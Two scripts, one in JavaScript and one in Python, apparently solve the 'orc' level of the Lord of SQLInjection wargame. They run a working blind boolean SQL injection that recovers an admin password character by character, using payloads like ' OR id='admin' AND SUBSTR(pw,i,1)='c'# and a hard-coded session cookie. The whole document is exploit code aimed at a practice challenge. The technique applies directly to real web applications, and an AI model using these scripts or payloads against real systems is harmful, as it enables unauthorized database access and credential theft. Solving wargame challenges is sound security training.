File: los/orc.js
const axios = require("axios");
const cheerio = require("cheerio");

let pw = "";

//브라우저를 통해 비밀번호가 8자리라는 것을 알아낸 상태임

(async () => {
  for (let i = 1; i < 9; i++) {
    for (let j = 48; j <= 128; j++) {
      await axios
        .get(
          "https://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php",
          {
            params: {
              pw: `' OR id='admin' AND substr(pw,${i},1)='${String.fromCharCode(
                j
              )}`,
            },
            headers: {
              Cookie:
                "PHPSESSID=4d0p7tg25oo1t92rlikt24i1q3; Path=/; Domain=.los.eagle-jump.org;",
            },
          }
        )
        .then((res) => {
          console.log("================");
          console.log(i, j);
          const $ = cheerio.load(res.data);
          if ($("h2").text() === "Hello admin") {
            console.log(String.fromCharCode(j));
            pw += String.fromCharCode(j);
            j = 129;
          }
        })
        .catch((err) => {
          console.log(err);
        });
    }
  }
  console.log(`pw: ${pw}`);
})();

File: los/orc.py
import requests

url = 'https://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php'
cookie = {'PHPSESSID': '4d0p7tg25oo1t92rlikt24i1q3'}

for length in range(4, 21):
    params = {'pw': f"' OR id='admin' AND LENGTH(pw)={length}#"}
    res = requests.get(url, params=params, cookies=cookie)

    if "Hello admin" in res.text:
        print(f"pw length is {length}")
        break

pw = ''
for i in range(length):
    print(f"=========checking start pw[{i}]=========")
    for j in range(33, 127):
        print(chr(j))
        params = {
            'pw': f"' OR id='admin' AND SUBSTR(pw, {i+1}, 1)='{chr(j)}'#"}
        res = requests.get(url, params=params, cookies=cookie)

        if "Hello admin" in res.text:
            print(f"pw[{i}] is {chr(j)}")
            pw += chr(j)
            break
print(pw)
